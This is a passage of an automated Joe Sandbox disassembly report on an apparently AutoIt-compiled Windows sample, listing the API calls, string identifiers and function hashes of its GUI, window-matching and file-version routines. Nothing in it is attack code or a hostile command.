                                          • Source File: 00000000.00000002.1459806294.0000000000901000.00000020.00000001.01000000.00000003.sdmp, Offset: 00900000, based on PE: true
                                           • Associated: 00000000.00000002.1459795013.0000000000900000.00000002.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.1459846117.000000000098F000.00000002.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.1459846117.00000000009B4000.00000002.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.1459877987.00000000009BE000.00000004.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.1459890264.00000000009C7000.00000002.00000001.01000000.00000003.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_900000_Gz2FxKx2cM.jbxd
                                          Similarity
                                          • API ID: BuffCharUpperVisibleWindow
                                          • String ID: ADDSTRING$CHECK$CURRENTTAB$DELSTRING$EDITPASTE$FINDSTRING$GETCURRENTCOL$GETCURRENTLINE$GETCURRENTSELECTION$GETLINE$GETLINECOUNT$GETSELECTED$HIDEDROPDOWN$ISCHECKED$ISENABLED$ISVISIBLE$SELECTSTRING$SENDCOMMANDID$SETCURRENTSELECTION$SHOWDROPDOWN$TABLEFT$TABRIGHT$UNCHECK
                                          • API String ID: 4105515805-45149045
                                          APIs
                                          • SetTextColor.GDI32(?,00000000), ref: 0098A630
                                          • GetSysColorBrush.USER32(0000000F), ref: 0098A661
                                          • GetSysColor.USER32(0000000F), ref: 0098A66D
                                          • SetBkColor.GDI32(?,000000FF), ref: 0098A687
                                          • SelectObject.GDI32(?,00000000), ref: 0098A696
                                          • InflateRect.USER32(?,000000FF,000000FF), ref: 0098A6C1
                                          • GetSysColor.USER32(00000010), ref: 0098A6C9
                                          • CreateSolidBrush.GDI32(00000000), ref: 0098A6D0
                                          • FrameRect.USER32(?,?,00000000), ref: 0098A6DF
                                          • DeleteObject.GDI32(00000000), ref: 0098A6E6
                                          • InflateRect.USER32(?,000000FE,000000FE), ref: 0098A731
                                          • FillRect.USER32(?,?,00000000), ref: 0098A763
                                          • GetWindowLongW.USER32(?,000000F0), ref: 0098A78E
                                            • Part of subcall function 0098A8CA: GetSysColor.USER32(00000012), ref: 0098A903
                                            • Part of subcall function 0098A8CA: SetTextColor.GDI32(?,?), ref: 0098A907
                                            • Part of subcall function 0098A8CA: GetSysColorBrush.USER32(0000000F), ref: 0098A91D
                                            • Part of subcall function 0098A8CA: GetSysColor.USER32(0000000F), ref: 0098A928
                                            • Part of subcall function 0098A8CA: GetSysColor.USER32(00000011), ref: 0098A945
                                            • Part of subcall function 0098A8CA: CreatePen.GDI32(00000000,00000001,00743C00), ref: 0098A953
                                            • Part of subcall function 0098A8CA: SelectObject.GDI32(?,00000000), ref: 0098A964
                                            • Part of subcall function 0098A8CA: SetBkColor.GDI32(?,00000000), ref: 0098A96D
                                            • Part of subcall function 0098A8CA: SelectObject.GDI32(?,?), ref: 0098A97A
                                            • Part of subcall function 0098A8CA: InflateRect.USER32(?,000000FF,000000FF), ref: 0098A999
                                            • Part of subcall function 0098A8CA: RoundRect.GDI32(?,?,?,?,?,00000005,00000005), ref: 0098A9B0
                                            • Part of subcall function 0098A8CA: GetWindowLongW.USER32(00000000,000000F0), ref: 0098A9C5
                                            • Part of subcall function 0098A8CA: SendMessageW.USER32(00000000,0000000E,00000000,00000000), ref: 0098A9ED
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1459806294.0000000000901000.00000020.00000001.01000000.00000003.sdmp, Offset: 00900000, based on PE: true
                                           • Associated: 00000000.00000002.1459795013.0000000000900000.00000002.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.1459846117.000000000098F000.00000002.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.1459846117.00000000009B4000.00000002.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.1459877987.00000000009BE000.00000004.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.1459890264.00000000009C7000.00000002.00000001.01000000.00000003.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_900000_Gz2FxKx2cM.jbxd
                                          Similarity
                                          • API ID: Color$Rect$Object$BrushInflateSelect$CreateLongTextWindow$DeleteFillFrameMessageRoundSendSolid
                                          • String ID:
                                          • API String ID: 3521893082-0
                                          APIs
                                          • DestroyWindow.USER32(?,?,?), ref: 00902CA2
                                          • DeleteObject.GDI32(00000000), ref: 00902CE8
                                          • DeleteObject.GDI32(00000000), ref: 00902CF3
                                          • DestroyIcon.USER32(00000000,?,?,?), ref: 00902CFE
                                          • DestroyWindow.USER32(00000000,?,?,?), ref: 00902D09
                                          • SendMessageW.USER32(?,00001308,?,00000000), ref: 0093C43B
                                          • ImageList_Remove.COMCTL32(?,000000FF,?), ref: 0093C474
                                          • MoveWindow.USER32(?,?,?,?,?,00000000), ref: 0093C89D
                                            • Part of subcall function 00901B41: InvalidateRect.USER32(?,00000000,00000001,?,?,?,00902036,?,00000000,?,?,?,?,009016CB,00000000,?), ref: 00901B9A
                                          • SendMessageW.USER32(?,00001053), ref: 0093C8DA
                                          • SendMessageW.USER32(?,00001008,000000FF,00000000), ref: 0093C8F1
                                          • ImageList_Destroy.COMCTL32(00000000,?,?), ref: 0093C907
                                          • ImageList_Destroy.COMCTL32(00000000,?,?), ref: 0093C912
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1459806294.0000000000901000.00000020.00000001.01000000.00000003.sdmp, Offset: 00900000, based on PE: true
                                           • Associated: 00000000.00000002.1459795013.0000000000900000.00000002.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.1459846117.000000000098F000.00000002.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.1459846117.00000000009B4000.00000002.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.1459877987.00000000009BE000.00000004.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.1459890264.00000000009C7000.00000002.00000001.01000000.00000003.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_900000_Gz2FxKx2cM.jbxd
                                          Similarity
                                          • API ID: Destroy$ImageList_MessageSendWindow$DeleteObject$IconInvalidateMoveRectRemove
                                          • String ID: 0
                                          • API String ID: 464785882-4108050209
                                          APIs
                                          • DestroyWindow.USER32(00000000), ref: 009774DE
                                          • SystemParametersInfoW.USER32(00000030,00000000,?,00000000), ref: 0097759D
                                          • SetRect.USER32(?,00000000,00000000,0000012C,00000064), ref: 009775DB
                                          • AdjustWindowRectEx.USER32(?,88C00000,00000000,00000006), ref: 009775ED
                                          • CreateWindowExW.USER32(00000006,AutoIt v3,?,88C00000,?,?,?,?,00000000,00000000,00000000), ref: 00977633
                                          • GetClientRect.USER32(00000000,?), ref: 0097763F
                                          • CreateWindowExW.USER32(00000000,static,?,50000000,?,00000004,00000500,00000018,00000000,00000000,00000000), ref: 00977683
                                          • CreateDCW.GDI32(DISPLAY,00000000,00000000,00000000), ref: 00977692
                                          • GetStockObject.GDI32(00000011), ref: 009776A2
                                          • SelectObject.GDI32(00000000,00000000), ref: 009776A6
                                          • GetTextFaceW.GDI32(00000000,00000040,?,?,50000000,?,00000004,00000500,00000018,00000000,00000000,00000000,?,88C00000,?), ref: 009776B6
                                          • GetDeviceCaps.GDI32(00000000,0000005A), ref: 009776BF
                                          • DeleteDC.GDI32(00000000), ref: 009776C8
                                          • CreateFontW.GDI32(00000000,00000000,00000000,00000000,00000258,00000000,00000000,00000000,00000001,00000004,00000000,00000002,00000000,?), ref: 009776F4
                                          • SendMessageW.USER32(00000030,00000000,00000001), ref: 0097770B
                                          • CreateWindowExW.USER32(00000200,msctls_progress32,00000000,50000001,?,0000001E,00000104,00000014,00000000,00000000,00000000), ref: 00977746
                                          • SendMessageW.USER32(00000000,00000401,00000000,00640000), ref: 0097775A
                                          • SendMessageW.USER32(00000404,00000001,00000000), ref: 0097776B
                                          • CreateWindowExW.USER32(00000000,static,?,50000000,?,00000037,00000500,00000032,00000000,00000000,00000000), ref: 0097779B
                                          • GetStockObject.GDI32(00000011), ref: 009777A6
                                          • SendMessageW.USER32(00000030,00000000,?,50000000), ref: 009777B1
                                          • ShowWindow.USER32(00000004,?,50000000,?,00000004,00000500,00000018,00000000,00000000,00000000,?,88C00000,?,?,?,?), ref: 009777BB
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1459806294.0000000000901000.00000020.00000001.01000000.00000003.sdmp, Offset: 00900000, based on PE: true
                                           • Associated: 00000000.00000002.1459795013.0000000000900000.00000002.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.1459846117.000000000098F000.00000002.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.1459846117.00000000009B4000.00000002.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.1459877987.00000000009BE000.00000004.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.1459890264.00000000009C7000.00000002.00000001.01000000.00000003.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_900000_Gz2FxKx2cM.jbxd
                                          Similarity
                                          • API ID: Window$Create$MessageSend$ObjectRect$Stock$AdjustCapsClientDeleteDestroyDeviceFaceFontInfoParametersSelectShowSystemText
                                          • String ID: AutoIt v3$DISPLAY$msctls_progress32$static
                                          • API String ID: 2910397461-517079104
                                          APIs
                                          • SetErrorMode.KERNEL32(00000001), ref: 0096AD1E
                                          • GetDriveTypeW.KERNEL32(?,0098FAC0,?,\\.\,0098F910), ref: 0096ADFB
                                          • SetErrorMode.KERNEL32(00000000,0098FAC0,?,\\.\,0098F910), ref: 0096AF59
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1459806294.0000000000901000.00000020.00000001.01000000.00000003.sdmp, Offset: 00900000, based on PE: true
                                           • Associated: 00000000.00000002.1459795013.0000000000900000.00000002.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.1459846117.000000000098F000.00000002.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.1459846117.00000000009B4000.00000002.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.1459877987.00000000009BE000.00000004.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.1459890264.00000000009C7000.00000002.00000001.01000000.00000003.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_900000_Gz2FxKx2cM.jbxd
                                          Similarity
                                          • API ID: ErrorMode$DriveType
                                          • String ID: 1394$ATA$ATAPI$CDROM$Fibre$FileBackedVirtual$Fixed$MMC$Network$PhysicalDrive$RAID$RAMDisk$Removable$SAS$SATA$SCSI$SSA$SSD$USB$Unknown$Virtual$\\.\$iSCSI
                                          • API String ID: 2907320926-4222207086
                                          APIs
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1459806294.0000000000901000.00000020.00000001.01000000.00000003.sdmp, Offset: 00900000, based on PE: true
                                           • Associated: 00000000.00000002.1459795013.0000000000900000.00000002.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.1459846117.000000000098F000.00000002.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.1459846117.00000000009B4000.00000002.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.1459877987.00000000009BE000.00000004.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.1459890264.00000000009C7000.00000002.00000001.01000000.00000003.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_900000_Gz2FxKx2cM.jbxd
                                          Similarity
                                          • API ID: __wcsnicmp
                                          • String ID: #OnAutoItStartRegister$#ce$#comments-end$#comments-start$#cs$#include$#include-once$#notrayicon$#pragma compile$#requireadmin$Bad directive syntax error$Cannot parse #include$Unterminated group of comments
                                          • API String ID: 1038674560-86951937
                                          APIs
                                          • SetWindowPos.USER32(00000000,00000000,00000000,00000000,00000000,00000000,00000103,?,?,?), ref: 00989AD2
                                          • SendMessageW.USER32(?,0000113F,00000000,00000008), ref: 00989B8B
                                          • SendMessageW.USER32(?,00001102,00000002,?), ref: 00989BA7
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1459806294.0000000000901000.00000020.00000001.01000000.00000003.sdmp, Offset: 00900000, based on PE: true
                                           • Associated: 00000000.00000002.1459795013.0000000000900000.00000002.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.1459846117.000000000098F000.00000002.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.1459846117.00000000009B4000.00000002.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.1459877987.00000000009BE000.00000004.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.1459890264.00000000009C7000.00000002.00000001.01000000.00000003.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_900000_Gz2FxKx2cM.jbxd
                                          Similarity
                                          • API ID: MessageSend$Window
                                          • String ID: 0
                                          • API String ID: 2326795674-4108050209
                                          APIs
                                          • GetSysColor.USER32(00000012), ref: 0098A903
                                          • SetTextColor.GDI32(?,?), ref: 0098A907
                                          • GetSysColorBrush.USER32(0000000F), ref: 0098A91D
                                          • GetSysColor.USER32(0000000F), ref: 0098A928
                                          • CreateSolidBrush.GDI32(?), ref: 0098A92D
                                          • GetSysColor.USER32(00000011), ref: 0098A945
                                          • CreatePen.GDI32(00000000,00000001,00743C00), ref: 0098A953
                                          • SelectObject.GDI32(?,00000000), ref: 0098A964
                                          • SetBkColor.GDI32(?,00000000), ref: 0098A96D
                                          • SelectObject.GDI32(?,?), ref: 0098A97A
                                          • InflateRect.USER32(?,000000FF,000000FF), ref: 0098A999
                                          • RoundRect.GDI32(?,?,?,?,?,00000005,00000005), ref: 0098A9B0
                                          • GetWindowLongW.USER32(00000000,000000F0), ref: 0098A9C5
                                          • SendMessageW.USER32(00000000,0000000E,00000000,00000000), ref: 0098A9ED
                                          • GetWindowTextW.USER32(00000000,00000000,00000001), ref: 0098AA14
                                          • InflateRect.USER32(?,000000FD,000000FD), ref: 0098AA32
                                          • DrawFocusRect.USER32(?,?), ref: 0098AA3D
                                          • GetSysColor.USER32(00000011), ref: 0098AA4B
                                          • SetTextColor.GDI32(?,00000000), ref: 0098AA53
                                          • DrawTextW.USER32(?,00000000,000000FF,?,?), ref: 0098AA67
                                          • SelectObject.GDI32(?,0098A5FA), ref: 0098AA7E
                                          • DeleteObject.GDI32(?), ref: 0098AA89
                                          • SelectObject.GDI32(?,?), ref: 0098AA8F
                                          • DeleteObject.GDI32(?), ref: 0098AA94
                                          • SetTextColor.GDI32(?,?), ref: 0098AA9A
                                          • SetBkColor.GDI32(?,?), ref: 0098AAA4
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1459806294.0000000000901000.00000020.00000001.01000000.00000003.sdmp, Offset: 00900000, based on PE: true
                                           • Associated: 00000000.00000002.1459795013.0000000000900000.00000002.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.1459846117.000000000098F000.00000002.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.1459846117.00000000009B4000.00000002.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.1459877987.00000000009BE000.00000004.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.1459890264.00000000009C7000.00000002.00000001.01000000.00000003.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_900000_Gz2FxKx2cM.jbxd
                                          Similarity
                                          • API ID: Color$Object$Text$RectSelect$BrushCreateDeleteDrawInflateWindow$FocusLongMessageRoundSendSolid
                                          • String ID:
                                          • API String ID: 1996641542-0
                                          APIs
                                          • SendMessageW.USER32(?,00000158,000000FF,0000014E), ref: 00988AC1
                                          • SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 00988AD2
                                          • CharNextW.USER32(0000014E), ref: 00988B01
                                          • SendMessageW.USER32(?,0000014B,00000000,00000000), ref: 00988B42
                                          • SendMessageW.USER32(?,00000158,000000FF,00000158), ref: 00988B58
                                          • SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 00988B69
                                          • SendMessageW.USER32(?,000000C2,00000001,0000014E), ref: 00988B86
                                          • SetWindowTextW.USER32(?,0000014E), ref: 00988BD8
                                          • SendMessageW.USER32(?,000000B1,000F4240,000F423F), ref: 00988BEE
                                          • SendMessageW.USER32(?,00001002,00000000,?), ref: 00988C1F
                                          • _memset.LIBCMT ref: 00988C44
                                          • SendMessageW.USER32(00000000,00001060,00000001,00000004), ref: 00988C8D
                                          • _memset.LIBCMT ref: 00988CEC
                                          • SendMessageW.USER32(?,00001053,000000FF,?), ref: 00988D16
                                          • SendMessageW.USER32(?,00001074,?,00000001), ref: 00988D6E
                                          • SendMessageW.USER32(?,0000133D,?,?), ref: 00988E1B
                                          • InvalidateRect.USER32(?,00000000,00000001), ref: 00988E3D
                                          • GetMenuItemInfoW.USER32(?,?,00000000,00000030), ref: 00988E87
                                          • SetMenuItemInfoW.USER32(?,?,00000000,00000030), ref: 00988EB4
                                          • DrawMenuBar.USER32(?), ref: 00988EC3
                                          • SetWindowTextW.USER32(?,0000014E), ref: 00988EEB
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1459806294.0000000000901000.00000020.00000001.01000000.00000003.sdmp, Offset: 00900000, based on PE: true
                                           • Associated: 00000000.00000002.1459795013.0000000000900000.00000002.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.1459846117.000000000098F000.00000002.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.1459846117.00000000009B4000.00000002.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.1459877987.00000000009BE000.00000004.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.1459890264.00000000009C7000.00000002.00000001.01000000.00000003.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_900000_Gz2FxKx2cM.jbxd
                                          Similarity
                                          • API ID: MessageSend$Menu$InfoItemTextWindow_memset$CharDrawInvalidateNextRect
                                          • String ID: 0
                                          • API String ID: 1073566785-4108050209
                                          APIs
                                          • GetCursorPos.USER32(?), ref: 009849CA
                                          • GetDesktopWindow.USER32 ref: 009849DF
                                          • GetWindowRect.USER32(00000000), ref: 009849E6
                                          • GetWindowLongW.USER32(?,000000F0), ref: 00984A48
                                          • DestroyWindow.USER32(?), ref: 00984A74
                                          • CreateWindowExW.USER32(00000008,tooltips_class32,00000000,00000003,80000000,80000000,80000000,80000000,00000000,00000000,00000000,00000000), ref: 00984A9D
                                          • SendMessageW.USER32(00000000,00000432,00000000,00000030), ref: 00984ABB
                                          • SendMessageW.USER32(?,00000439,00000000,00000030), ref: 00984AE1
                                          • SendMessageW.USER32(?,00000421,?,?), ref: 00984AF6
                                          • SendMessageW.USER32(?,0000041D,00000000,00000000), ref: 00984B09
                                          • IsWindowVisible.USER32(?), ref: 00984B29
                                          • SendMessageW.USER32(?,00000412,00000000,D8F0D8F0), ref: 00984B44
                                          • SendMessageW.USER32(?,00000411,00000001,00000030), ref: 00984B58
                                          • GetWindowRect.USER32(?,?), ref: 00984B70
                                          • MonitorFromPoint.USER32(?,?,00000002), ref: 00984B96
                                          • GetMonitorInfoW.USER32(00000000,?), ref: 00984BB0
                                          • CopyRect.USER32(?,?), ref: 00984BC7
                                          • SendMessageW.USER32(?,00000412,00000000), ref: 00984C32
                                          Strings
                                          Similarity
                                          • API ID: MessageSendWindow$Rect$Monitor$CopyCreateCursorDesktopDestroyFromInfoLongPointVisible
                                          • String ID: ($0$tooltips_class32
                                          • API String ID: 698492251-4156429822
                                          • Opcode ID: 2f842bfb4b7e57c5c5ddfac9435115d69d38f00ed1730e5c0f6372d418dd2923
                                          • Instruction ID: 119d421c5388649f8a0fee62f702d41fcf1b3b59b08c0a3a0b85b2483fd2c463
                                          • Opcode Fuzzy Hash: 2f842bfb4b7e57c5c5ddfac9435115d69d38f00ed1730e5c0f6372d418dd2923
                                          • Instruction Fuzzy Hash: D1B17B71608341AFDB04EF64C844B6ABBE8BF88714F008A1DF999AB3A1D771EC05CB55
                                          APIs
                                          • GetFileVersionInfoSizeW.VERSION(?,?), ref: 009644AC
                                          • GetFileVersionInfoW.VERSION(?,00000000,00000000,00000000,?,?), ref: 009644D2
                                          • _wcscpy.LIBCMT ref: 00964500
                                          • _wcscmp.LIBCMT ref: 0096450B
                                          • _wcscat.LIBCMT ref: 00964521
                                          • _wcsstr.LIBCMT ref: 0096452C
                                          • VerQueryValueW.VERSION(?,\VarFileInfo\Translation,?,?,?,?,?,?,00000000,?,?), ref: 00964548
                                          • _wcscat.LIBCMT ref: 00964591
                                          • _wcscat.LIBCMT ref: 00964598
                                          • _wcsncpy.LIBCMT ref: 009645C3
                                          Strings
                                          Similarity
                                          • API ID: _wcscat$FileInfoVersion$QuerySizeValue_wcscmp_wcscpy_wcsncpy_wcsstr
                                          • String ID: %u.%u.%u.%u$04090000$DefaultLangCodepage$StringFileInfo\$\VarFileInfo\Translation
                                          • API String ID: 699586101-1459072770
                                          • Opcode ID: e8d0152406589ede621ce9d4a1ac48a43d2e4dd02f841c8d2e3895997c855a6a
                                          • Instruction ID: 4c27d048c757c1e3f02c4a3bb29b74f6a6dabaa6e73be8b32ef9a9bfc1f12d4f
                                          • Opcode Fuzzy Hash: e8d0152406589ede621ce9d4a1ac48a43d2e4dd02f841c8d2e3895997c855a6a
                                          • Instruction Fuzzy Hash: 2C41D431A00214BBEB14BBB4EC47FBF77ACDFC5720F04046AF905E6182EA349A0197A5
                                          APIs
                                          • SystemParametersInfoW.USER32(00000030,00000000,000000FF,00000000), ref: 009028BC
                                          • GetSystemMetrics.USER32(00000007), ref: 009028C4
                                          • SystemParametersInfoW.USER32(00000030,00000000,000000FF,00000000), ref: 009028EF
                                          • GetSystemMetrics.USER32(00000008), ref: 009028F7
                                          • GetSystemMetrics.USER32(00000004), ref: 0090291C
                                          • SetRect.USER32(000000FF,00000000,00000000,000000FF,000000FF), ref: 00902939
                                          • AdjustWindowRectEx.USER32(000000FF,?,00000000,?), ref: 00902949
                                          • CreateWindowExW.USER32(?,AutoIt v3 GUI,?,?,?,000000FF,000000FF,000000FF,?,00000000,00000000), ref: 0090297C
                                          • SetWindowLongW.USER32(00000000,000000EB,00000000), ref: 00902990
                                          • GetClientRect.USER32(00000000,000000FF), ref: 009029AE
                                          • GetStockObject.GDI32(00000011), ref: 009029CA
                                          • SendMessageW.USER32(00000000,00000030,00000000), ref: 009029D5
                                            • Part of subcall function 00902344: GetCursorPos.USER32(?), ref: 00902357
                                            • Part of subcall function 00902344: ScreenToClient.USER32(009C57B0,?), ref: 00902374
                                            • Part of subcall function 00902344: GetAsyncKeyState.USER32(00000001), ref: 00902399
                                            • Part of subcall function 00902344: GetAsyncKeyState.USER32(00000002), ref: 009023A7
                                          • SetTimer.USER32(00000000,00000000,00000028,00901256), ref: 009029FC
                                          Strings
                                          Similarity
                                          • API ID: System$MetricsRectWindow$AsyncClientInfoParametersState$AdjustCreateCursorLongMessageObjectScreenSendStockTimer
                                          • String ID: AutoIt v3 GUI
                                          • API String ID: 1458621304-248962490
                                          • Opcode ID: a432ec986b5de02abbbf71c9abc3e6cdcac5b7ba5e05aa67641e44efc8a8a3f3
                                          • Instruction ID: 10836ff4604b2ef2423379263290f3acba601004f47d334fff25803e56cce972
                                          • Opcode Fuzzy Hash: a432ec986b5de02abbbf71c9abc3e6cdcac5b7ba5e05aa67641e44efc8a8a3f3
                                          • Instruction Fuzzy Hash: DEB18D71A1460AEFDB14DFA8CC59BAE7BB4FB48314F104229FA15E72E0DB74A850DB50
                                          APIs
                                          • GetClassNameW.USER32(?,?,00000100), ref: 0095A47A
                                          • __swprintf.LIBCMT ref: 0095A51B
                                          • _wcscmp.LIBCMT ref: 0095A52E
                                          • SendMessageTimeoutW.USER32(?,?,00000101,00000000,00000002,00001388,?), ref: 0095A583
                                          • _wcscmp.LIBCMT ref: 0095A5BF
                                          • GetClassNameW.USER32(?,?,00000400), ref: 0095A5F6
                                          • GetDlgCtrlID.USER32(?), ref: 0095A648
                                          • GetWindowRect.USER32(?,?), ref: 0095A67E
                                          • GetParent.USER32(?), ref: 0095A69C
                                          • ScreenToClient.USER32(00000000), ref: 0095A6A3
                                          • GetClassNameW.USER32(?,?,00000100), ref: 0095A71D
                                          • _wcscmp.LIBCMT ref: 0095A731
                                          • GetWindowTextW.USER32(?,?,00000400), ref: 0095A757
                                          • _wcscmp.LIBCMT ref: 0095A76B
                                            • Part of subcall function 0092362C: _iswctype.LIBCMT ref: 00923634
                                          Strings
                                          Similarity
                                          • API ID: _wcscmp$ClassName$Window$ClientCtrlMessageParentRectScreenSendTextTimeout__swprintf_iswctype
                                          • String ID: %s%u
                                          • API String ID: 3744389584-679674701
                                          • Opcode ID: 25849cff77dd8f021fd777b7eaf8631b383860f3f8afe15b6548fd9ebb72aaa9
                                          • Instruction ID: e660ea68fcdbfa8375c89cfb79a5056fbdd2f9b60b97d92761e74260702d3891
                                          • Opcode Fuzzy Hash: 25849cff77dd8f021fd777b7eaf8631b383860f3f8afe15b6548fd9ebb72aaa9
                                          • Instruction Fuzzy Hash: 02A1D231604206AFD714DF61C884FAAB7ECFF48316F048629FD99C2190DB34E959CB96
                                          APIs
                                          • GetClassNameW.USER32(00000008,?,00000400), ref: 0095AF18
                                          • _wcscmp.LIBCMT ref: 0095AF29
                                          • GetWindowTextW.USER32(00000001,?,00000400), ref: 0095AF51
                                          • CharUpperBuffW.USER32(?,00000000), ref: 0095AF6E
                                          • _wcscmp.LIBCMT ref: 0095AF8C
                                          • _wcsstr.LIBCMT ref: 0095AF9D
                                          • GetClassNameW.USER32(00000018,?,00000400), ref: 0095AFD5
                                          • _wcscmp.LIBCMT ref: 0095AFE5
                                          • GetWindowTextW.USER32(00000002,?,00000400), ref: 0095B00C
                                          • GetClassNameW.USER32(00000018,?,00000400), ref: 0095B055
                                          • _wcscmp.LIBCMT ref: 0095B065
                                          • GetClassNameW.USER32(00000010,?,00000400), ref: 0095B08D
                                          • GetWindowRect.USER32(00000004,?), ref: 0095B0F6
                                          Strings
                                          Similarity
                                          • API ID: ClassName_wcscmp$Window$Text$BuffCharRectUpper_wcsstr
                                          • String ID: @$ThumbnailClass
                                          • API String ID: 1788623398-1539354611
                                          • Opcode ID: e2aa9a1641ff2a009d245e6f96882b46050f5e3811f7b091b5ba1cae87abd484
                                          • Instruction ID: fd5b6098a77c1bdae30c82f6003ced9c4e0fa28203f190609dc8b4771f22da1e
                                          • Opcode Fuzzy Hash: e2aa9a1641ff2a009d245e6f96882b46050f5e3811f7b091b5ba1cae87abd484
                                          • Instruction Fuzzy Hash: A081B1711082099FDB05DF22C891FAABBECEF84315F14856AFD898A095DB34DD4DCBA1
                                          APIs
                                          Strings
                                          Similarity
                                          • API ID: __wcsnicmp
                                          • String ID: ACTIVE$ALL$CLASSNAME=$HANDLE=$LAST$REGEXP=$[ACTIVE$[ALL$[CLASS:$[HANDLE:$[LAST$[REGEXPTITLE:
                                          • API String ID: 1038674560-1810252412
                                          • Opcode ID: dd180425e7dd66b10587364051b3f5f96d1f46c76be405978f34035190163ca0
                                          • Instruction ID: 6c95a42fff4265bb8939baeb132d3d32451a157fe6f7e78adf2131a8ca27a90e
                                          • Opcode Fuzzy Hash: dd180425e7dd66b10587364051b3f5f96d1f46c76be405978f34035190163ca0
                                          • Instruction Fuzzy Hash: 32318431A48209AFDB14FAA1EE03FEEB768AF90725F600619F841710D5EF556F08C656
                                          APIs
                                          • LoadCursorW.USER32(00000000,00007F8A), ref: 00975013
                                          • LoadCursorW.USER32(00000000,00007F00), ref: 0097501E
                                          • LoadCursorW.USER32(00000000,00007F03), ref: 00975029
                                          • LoadCursorW.USER32(00000000,00007F8B), ref: 00975034
                                          • LoadCursorW.USER32(00000000,00007F01), ref: 0097503F
                                          • LoadCursorW.USER32(00000000,00007F81), ref: 0097504A
                                          • LoadCursorW.USER32(00000000,00007F88), ref: 00975055
                                          • LoadCursorW.USER32(00000000,00007F80), ref: 00975060
                                          • LoadCursorW.USER32(00000000,00007F86), ref: 0097506B
                                          • LoadCursorW.USER32(00000000,00007F83), ref: 00975076
                                          • LoadCursorW.USER32(00000000,00007F85), ref: 00975081
                                          • LoadCursorW.USER32(00000000,00007F82), ref: 0097508C
                                          • LoadCursorW.USER32(00000000,00007F84), ref: 00975097
                                          • LoadCursorW.USER32(00000000,00007F04), ref: 009750A2
                                          • LoadCursorW.USER32(00000000,00007F02), ref: 009750AD
                                          • LoadCursorW.USER32(00000000,00007F89), ref: 009750B8
                                          • GetCursorInfo.USER32(?), ref: 009750C8
                                          Similarity
                                          • API ID: Cursor$Load$Info
                                          • String ID:
                                          • API String ID: 2577412497-0
                                          • Opcode ID: 0f1dce294085259b7eebffc95076f9eba56b9a42ef250c1a10797671a24e957d
                                          • Instruction ID: c6c8272fe6d23e9826ec1d42b18e4fcac83f08bce1f774a8f889943ab0926c83
                                          • Opcode Fuzzy Hash: 0f1dce294085259b7eebffc95076f9eba56b9a42ef250c1a10797671a24e957d
                                          • Instruction Fuzzy Hash: 5131D2B1D48319AADF509FB68C8996EBFE8FF04750F50852AE50DE7281DA78A5008F91
                                          APIs
                                          • _memset.LIBCMT ref: 0098A259
                                          • DestroyWindow.USER32(?,?), ref: 0098A2D3
                                            • Part of subcall function 00907BCC: _memmove.LIBCMT ref: 00907C06
